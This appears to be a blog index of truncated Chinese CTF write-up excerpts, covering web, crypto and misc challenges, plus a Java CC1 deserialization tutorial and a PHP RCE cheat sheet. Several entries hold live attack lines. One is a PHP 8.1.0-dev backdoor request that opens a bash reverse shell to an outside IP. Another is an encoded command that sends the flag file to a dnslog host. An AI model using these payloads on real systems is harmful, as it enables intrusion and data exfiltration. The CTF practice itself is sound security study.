2024HSCCTF
2024HSCCTFMISCSign010手提出来图片
写了HAPPY_NEW_YEAR,猜测是密码、
outguess提取
1outguess -k HAPPY_NEW_YEAR -r happy.jpg 1.txt
HSCCTF{Welcome_to_HSCCTF}
WebPWD123456789101112131415161718192021 <?phperror_reporting(0);highlight_file(__FILE__);$con = mysqli_connect("localhost","root","root","ccut");function waffff($sql) { if (preg_match("/infor|sys|sql|thread|case|when|if|like|left|right|mid|cmp|sub|locate|position|match|find|field|sleep|repeat|lock|bench|p ...
2024XYCTF
XYCTFWebezPop1234567891011121314151617181920212223242526272829303132333435363738394041424344<?phperror_reporting(0);highlight_file(__FILE__);class AAA{public $s;public $a;public function __toString(){echo "you get 2 A <br>";$p = $this->a;return $this->s->$p;}}class BBB{public $c;public $d;public function __get($name){echo "you get 2 B <br>";$a=$_POST['a'];$b=$_POST;$c=$this->c;$d=$this->d;if (isset($b[' ...
2024青少年CTF擂台挑战赛Round#1-WP
青少年CTF擂台挑战赛2024Round#1-WPCRYPTO四重加密压缩包备注
OFZW4Y3UMY======
base64解
qsnctf
解开压缩包得到 HTML转移得到 md格式问题自己转成维吉尼亚加密形式
zcye{mxmemtxrzt_lzbha_kwmqzec}|key=hello
得到rot13的flag
synt{yqitbfqnoi_xsxwp_wpifoqv}
flag{ldvgosdabv_kfkjc_jcvsbdi}
ez_log附件:
12345678910from Crypto.Util.numb ...
CC链学习-Cc1
CC链学习
CC1
组件介绍
Apache Commons 当中有⼀个组件叫做 Apache Commons Collections ,主要封装了Java 的 Collection(集合) 相关类对象,它提供了很多强有⼒的数据结构类型并且实现了各种集合工具类。
作为Apache开源项⽬的重要组件,Commons Collections被⼴泛应⽤于各种Java应⽤的开发,⽽正 是因为在⼤量web应⽤程序中这些类的实现以及⽅法的调⽤,导致了反序列化⽤漏洞的普遍性和严重性。
Apache Commons Collections中有⼀个特殊的接口,其中有⼀个实现该接口的类可以通过调用 Java的反射机制来调用任意函数,叫做InvokerTransformer。
环境搭建需要先配置jdk,jdk<8u71即可,我用的是JDK8u65
因为jdk自带的包里面有些文件是反编译的.class文件,我们没法清楚的看懂代码,为了方便我们调试,我们需要将他们转变为.java的文件,这就需要我们安装相应的源码:https://hg.openjdk.org/jdk8u/jdk8u/j ...
SICTF-Round#3-Wp
SICTF-Round#3-wp题解:
MISC[签到]签到
最终分数:100pts
扫描微信公众号回复”SICTF{Round3,我来辣~}”获取flag
SICTF{1f4ce05a-0fed-42dc-9510-6e76dff8ff53}
GeekChallege
最终分数 269 pts
我的密码可是很长的呢!(nc)
Rule:If the i-th character of the string you input is the same as the i-th character of my password, I will output a 1. Otherwise, I will output a 0. Keep guessing my password until you get it right, and I will give you flag
Tip:len(array)=5&&len(passwd)=114
已知规则为爆破密码,密码为5位长度的数组构成的114个密码
所以先进行爆破数组,然后就可以快速爆破密码
...
2024VNCTF--赛后复现
2024VNCTF–赛后复现WebCheckin源码里能找到一串编码,控制台运行一下出
CutePathgit1hub发现安全性问题,导致目录穿越
目录穿越看到flag
一级级目录测试,发现home/ming发现用户名和密码
1admin:gdgm.edu.cn@M1n9K1n9P@as
登录试试,发现登录成功
发现多了重命名功能
尝试发现修改为目录名,文件会移动到相应文件夹
前面已经发现flag在../../../flag/flag下
重命名为../../../home/ming/share_main/flag.txt,之后回到主页面,访问flag.txt
TrySent
开题sentcms,搜索对应漏洞,发现是CVE-2022-24651
先注册一个用户登录上
任意文件上传漏洞,没有文件路径,我们自己构造
12345678910111213141516171819202122232425262728293031323334353637383940414243444 ...
NSSCTF Round18(情人节专场)
NSSCTF Round18(情人节专场)WebBecomeroot发现php版本是PHP/8.1.0-dev
搜索发现存在后门执行漏洞
https://cloud.tencent.com/developer/article/1839234
123456789GET / HTTP/1.1Host: node1.anna.nssctf.cn:28752User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0User-Agentt: zerodiumsystem("bash -c 'exec bash -i >& /dev/tcp/101.34.80.152/9999 0>&1'"); //尝试反弹shellAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0 ...
2024HgameCTF
2024HgameCTFWeek1Web2048*16js源码找到密文
码表
base64解密
jhat第一次明白了dnslog不算出网。。。。
唉
1java.lang.Runtime.getRuntime().exec("bash -c {echo,Y3VybCBgY2F0IC9mbGFnYC41aDlqMXMuZG5zbG9nLmNu}|{base64,-d}|{bash,-i}")
Misc来自星尘的问候https://my1l.github.io/Ctrl/CtrlAstr.html
希尔希尔希尔修复图片得到
stegslove lsb隐写得到key
1KEY:[[8 7][3 8]];A=0
010发现图片藏有txt文件
改为zip,得到密文
CVOCRJGMKLDJGBQIUIVXHEYLPNWR
希尔密码解密
hgame{DISAPPEARINTHESEAOFBUTTERFLY}
CryptoezMath12345678910111213141516171819202122 ...
Rce大总结
Rce大总结12345var_dump +file读文件 var_dump换成print_r也行PHP代码执行函数:eval()、assert()、preg_replace()、create_function()、array_map()、call_user_func()、call_user_func_array()、array_filter()、uasort()、等PHP命令执行函数:system()、exec()、shell_exec()、pcntl_exec()、popen()、proc_popen()、passthru()、等
命令大全
123456789101112131415161718192021222324252627282930more:一页一页的显示档案内容less:与 more 类似head:查看头几行tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示tail:查看尾几行nl:显示的时候,顺便输出行号od:以二进制的方式读取档案内容vi:一种编辑器,这个也可以查看vim:一种编辑器,这个也可以查看sort:可以查看uniq:可以查看file -f ...
日常题目练习记录
日常题目练习WEBSWPUCTF 2022 新生赛]ez_ez_unserialize12345678910111213141516171819202122<?phpclass X{ public $x = "fllllllag.php";// function __construct($x)// {// $this->x = $x;// } function __wakeup() { if ($this->x !== *__FILE__*) { $this->x = "fllllllag.php"; } } function __destruct() { highlight_file($this->x); //flag is in fllllllag.php }}$a ...